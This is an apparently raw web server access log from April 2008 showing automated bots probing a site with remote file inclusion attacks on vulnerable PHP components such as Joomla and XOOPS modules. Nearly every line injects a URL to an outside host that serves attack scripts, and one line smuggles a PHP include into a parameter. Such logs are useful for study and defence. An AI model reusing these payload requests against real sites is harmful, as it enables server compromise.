203.72.181.15 - - [30/Apr/2008:11:58:45 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
91.188.211.28 - - [30/Apr/2008:11:59:06 -0700] "GET /logs/access_080225.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [30/Apr/2008:11:59:13 -0700] "GET /logs/access.log/index.php?option=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [30/Apr/2008:11:59:19 -0700] "GET /index.php?option=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [30/Apr/2008:11:59:23 -0700] "GET /logs/index.php?option=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:11:59:32 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:11:59:32 -0700] "GET /logs/access_080228.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:11:59:32 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.252.12.2 - - [30/Apr/2008:11:59:34 -0700] "GET /logs/access_080218.log//spaw_control.class.php?spaw_root=http://forums.gay-forums.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
196.35.158.181 - - [30/Apr/2008:11:59:34 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [30/Apr/2008:11:59:38 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:59:40 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:59:40 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:59:40 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:59:41 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:59:41 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:59:41 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:11:59:44 -0700] "GET /logs/access_080228.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:11:59:44 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:59:44 -0700] "GET /logs//main.php?sayfa=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:59:48 -0700] "GET //main.php?sayfa=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:11:59:50 -0700] "GET /logs/access_080228.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:11:59:50 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.13.98.174 - - [30/Apr/2008:11:59:54 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:11:59:55 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:11:59:55 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:11:59:55 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:12:00:28 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.89 - - [30/Apr/2008:12:00:38 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.globalcare.or.kr/zboard/data/thumimg/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [30/Apr/2008:12:00:38 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.globalcare.or.kr/zboard/data/thumimg/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [30/Apr/2008:12:00:39 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.globalcare.or.kr/zboard/data/thumimg/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:12:00:40 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:00:42 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:00:43 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:00:43 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:12:00:53 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:12:01:00 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.245.146 - - [30/Apr/2008:12:01:09 -0700] "GET / HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:01:11 -0700] "GET /logs/access_080228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:01:12 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:01:12 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:12:01:13 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [30/Apr/2008:12:01:15 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://contactcraze.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:12:01:18 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.75.104 - - [30/Apr/2008:12:01:25 -0700] "GET /logs/access_080227.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://contactcraze.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [30/Apr/2008:12:01:25 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://contactcraze.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [30/Apr/2008:12:01:25 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://contactcraze.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:01:38 -0700] "GET /logs/access_080117.log//skin/zero_vote/error.php?dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:12:01:40 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:01:41 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:01:42 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:12:02:10 -0700] "GET /logs/access_080210.log/config.inc.php?path_escape=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:12:02:21 -0700] "GET /logs/access_080218.log/convert/mvcw.php?vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.37.143 - - [30/Apr/2008:12:02:31 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://kas.casperhelix.com/phpBB3/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.37.143 - - [30/Apr/2008:12:02:31 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://kas.casperhelix.com/phpBB3/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.37.143 - - [30/Apr/2008:12:02:31 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://kas.casperhelix.com/phpBB3/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:12:02:41 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:12:02:45 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:12:02:45 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:12:02:46 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:12:02:50 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:12:02:51 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:12:02:51 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.168.112.10 - - [30/Apr/2008:12:02:52 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [30/Apr/2008:12:02:53 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [30/Apr/2008:12:02:53 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:12:03:07 -0700] "GET /logs/access_080226.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:12:03:10 -0700] "GET /logs/access_080227.log/config.inc.php?path_escape=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:03:38 -0700] "GET /logs/access_080204.log/enc/content.php?Home_Path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:12:03:40 -0700] "GET /logs/access_080321.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:03:41 -0700] "GET /enc/content.php?Home_Path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:03:44 -0700] "GET /logs/enc/content.php?Home_Path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:12:03:45 -0700] "GET /logs/access_080228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:12:03:45 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:12:03:46 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.78.135 - - [30/Apr/2008:12:04:05 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mittweida.biz/images/.../pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:04:07 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:04:07 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.78.135 - - [30/Apr/2008:12:04:16 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mittweida.biz/images/.../pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:12:04:17 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:12:04:17 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:12:04:18 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:04:23 -0700] "GET /logs//main.php?sayfa=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:04:26 -0700] "GET //main.php?sayfa=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.78.135 - - [30/Apr/2008:12:04:28 -0700] "GET /logs/access_080228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mittweida.biz/images/.../pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.78.135 - - [30/Apr/2008:12:04:28 -0700] "GET /logs/access_071229.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mittweida.biz/images/.../pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:12:04:30 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:12:04:30 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:12:04:31 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.199.73 - - [30/Apr/2008:12:04:44 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.joomla.teafree.pl/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.199.73 - - [30/Apr/2008:12:04:48 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.joomla.teafree.pl/editor/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.199.73 - - [30/Apr/2008:12:04:49 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.joomla.teafree.pl/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:12:05:21 -0700] "GET /logs/index2.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:12:05:21 -0700] "GET /index2.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:12:05:24 -0700] "GET /logs/access_080228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:12:05:25 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:12:05:25 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:12:05:54 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:12:05:54 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:12:05:56 -0700] "GET /logs/access_080226.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:12:06:18 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:06:20 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:06:20 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:06:21 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.181 - - [30/Apr/2008:12:06:21 -0700] "GET //ashnews.php?pathtoashnews=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [30/Apr/2008:12:06:27 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:06:31 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:12:06:35 -0700] "GET /logs/access_080223.log/index2.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:12:06:35 -0700] "GET /index2.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:12:06:35 -0700] "GET /logs/index2.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:06:43 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:06:47 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:12:06:47 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:12:06:48 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:12:06:58 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:12:06:59 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
